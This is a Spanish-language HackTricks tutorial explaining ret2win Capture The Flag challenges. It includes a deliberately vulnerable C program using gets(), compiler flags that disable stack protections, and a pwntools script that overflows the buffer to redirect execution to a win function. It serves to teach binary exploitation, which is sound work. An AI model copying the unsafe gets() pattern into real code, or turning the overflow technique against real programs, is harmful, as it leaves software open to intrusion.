.. | ||
README.md | ||
ret2win-arm64.md |
Ret2win
Aprende hacking en AWS desde cero hasta experto con htARTE (HackTricks AWS Red Team Expert)!
Otras formas de apoyar a HackTricks:
- Si quieres ver tu empresa anunciada en HackTricks o descargar HackTricks en PDF ¡Consulta los PLANES DE SUSCRIPCIÓN!
- Obtén la merchandising oficial de PEASS & HackTricks
- Descubre The PEASS Family, nuestra colección exclusiva de NFTs
- Únete al 💬 grupo de Discord o al grupo de telegram o síguenos en Twitter 🐦 @hacktricks_live.
- Comparte tus trucos de hacking enviando PRs a los repositorios de HackTricks y HackTricks Cloud.
Información Básica
Los desafíos de Ret2win son una categoría popular en competiciones de Capture The Flag (CTF), especialmente en tareas que involucran explotación binaria. El objetivo es explotar una vulnerabilidad en un binario dado para ejecutar una función específica no invocada dentro del binario, a menudo nombrada como win
, flag
, etc. Esta función, al ejecutarse, generalmente imprime una bandera o un mensaje de éxito. El desafío típicamente implica sobrescribir la dirección de retorno en la pila para desviar el flujo de ejecución hacia la función deseada. Aquí tienes una explicación más detallada con ejemplos:
Ejemplo en C
Considera un programa simple en C con una vulnerabilidad y una función win
que pretendemos llamar:
#include <stdio.h>
#include <string.h>
void win() {
printf("Congratulations! You've called the win function.\n");
}
void vulnerable_function() {
char buf[64];
gets(buf); // This function is dangerous because it does not check the size of the input, leading to buffer overflow.
}
int main() {
vulnerable_function();
return 0;
}
Para compilar este programa sin protecciones de pila y con ASLR deshabilitado, puedes usar el siguiente comando:
gcc -m32 -fno-stack-protector -z execstack -no-pie -o vulnerable vulnerable.c
-m32
: Compila el programa como un binario de 32 bits (esto es opcional pero común en desafíos de CTF).-fno-stack-protector
: Deshabilita las protecciones contra desbordamientos de pila.-z execstack
: Permite la ejecución de código en la pila.-no-pie
: Deshabilita el Ejecutable de Posición Independiente para asegurar que la dirección de la funciónwin
no cambie.-o vulnerable
: Nombre el archivo de salida comovulnerable
.
Exploit en Python usando Pwntools
Para el exploit, utilizaremos pwntools, un potente marco de trabajo de CTF para escribir exploits. El script de exploit creará un payload para desbordar el búfer y sobrescribir la dirección de retorno con la dirección de la función win
.
from pwn import *
# Set up the process and context for the binary
binary_path = './vulnerable'
p = process(binary_path)
context.binary = binary_path
# Find the address of the win function
win_addr = p32(0x08048456) # Replace 0x08048456 with the actual address of the win function in your binary
# Create the payload
# The buffer size is 64 bytes, and the saved EBP is 4 bytes. Hence, we need 68 bytes before we overwrite the return address.
payload = b'A' * 68 + win_addr
# Send the payload
p.sendline(payload)
p.interactive()
Para encontrar la dirección de la función win
, puedes usar gdb, objdump, u otra herramienta que te permita inspeccionar archivos binarios. Por ejemplo, con objdump
, podrías usar:
objdump -d vulnerable | grep win
Este comando mostrará el ensamblado de la función win
, incluyendo su dirección de inicio.
El script de Python envía un mensaje cuidadosamente elaborado que, al ser procesado por la vulnerable_function
, desborda el búfer y sobrescribe la dirección de retorno en la pila con la dirección de win
. Cuando vulnerable_function
retorna, en lugar de regresar a main
o salir, salta a win
, y se imprime el mensaje.
Protecciones
- PIE debe estar deshabilitado para que la dirección sea confiable en ejecuciones sucesivas, de lo contrario la dirección donde se almacenará la función no será siempre la misma y se necesitaría alguna filtración para averiguar dónde se encuentra cargada la función
win
. En algunos casos, cuando la función que causa el desbordamiento esread
o similar, se puede realizar un Sobrescribir Parcial de 1 o 2 bytes para cambiar la dirección de retorno y que apunte a la funciónwin
. Debido a cómo funciona ASLR, los últimos tres nibbles hexadecimales no se aleatorizan, por lo que hay una probabilidad de 1/16 (1 nibble) de obtener la dirección de retorno correcta. - Los Canarios de Pila también deben estar deshabilitados o la dirección de retorno comprometida de EIP nunca será seguida.
Otros ejemplos y Referencias
- https://ir0nstone.gitbook.io/notes/types/stack/ret2win
- https://guyinatuxedo.github.io/04-bof_variable/tamu19_pwn1/index.html
- 32 bits, sin ASLR
- https://guyinatuxedo.github.io/05-bof_callfunction/csaw16_warmup/index.html
- 64 bits con ASLR, con una filtración de la dirección binaria
- https://guyinatuxedo.github.io/05-bof_callfunction/csaw18_getit/index.html
- 64 bits, sin ASLR
- https://guyinatuxedo.github.io/05-bof_callfunction/tu17_vulnchat/index.html
- 32 bits, sin ASLR, doble desbordamiento pequeño, primero para desbordar la pila y aumentar el tamaño del segundo desbordamiento
- https://guyinatuxedo.github.io/10-fmt_strings/backdoor17_bbpwn/index.html
- 32 bits, relro, sin canario, nx, sin pie, cadena de formato para sobrescribir la dirección
fflush
con la funciónwin
(ret2win) - https://guyinatuxedo.github.io/15-partial_overwrite/tamu19_pwn2/index.html
- 32 bits, nx, nada más, sobrescribir parcialmente EIP (1 byte) para llamar a la función
win
- https://guyinatuxedo.github.io/15-partial_overwrite/tuctf17_vulnchat2/index.html
- 32 bits, nx, nada más, sobrescribir parcialmente EIP (1 byte) para llamar a la función
win
- https://guyinatuxedo.github.io/35-integer_exploitation/int_overflow_post/index.html
- El programa solo valida el último byte de un número para verificar el tamaño de la entrada, por lo tanto es posible agregar cualquier tamaño siempre que el último byte esté dentro del rango permitido. Luego, la entrada crea un desbordamiento de búfer explotado con un ret2win.
- https://7rocky.github.io/en/ctf/other/blackhat-ctf/fno-stack-protector/
- 64 bits, relro, sin canario, nx, pie. Sobrescribir parcialmente para llamar a la función
win
(ret2win) - https://8ksec.io/arm64-reversing-and-exploitation-part-3-a-simple-rop-chain/
- arm64, PIE, proporciona una filtración de PIE, la función
win
en realidad son 2 funciones, por lo que el gadget ROP llama a 2 funciones - https://8ksec.io/arm64-reversing-and-exploitation-part-9-exploiting-an-off-by-one-overflow-vulnerability/
- ARM64, off-by-one para llamar a una función
win
Ejemplo ARM64
{% content-ref url="ret2win-arm64.md" %} ret2win-arm64.md {% endcontent-ref %}
Aprende hacking en AWS desde cero hasta experto con htARTE (HackTricks AWS Red Team Expert)!
Otras formas de apoyar a HackTricks:
- Si deseas ver tu empresa anunciada en HackTricks o descargar HackTricks en PDF ¡Consulta los PLANES DE SUSCRIPCIÓN!
- Obtén el oficial PEASS & HackTricks swag
- Descubre The PEASS Family, nuestra colección exclusiva de NFTs
- Únete al 💬 grupo de Discord o al grupo de telegram o síguenos en Twitter 🐦 @hacktricks_live.
- Comparte tus trucos de hacking enviando PRs a los repositorios de HackTricks y HackTricks Cloud.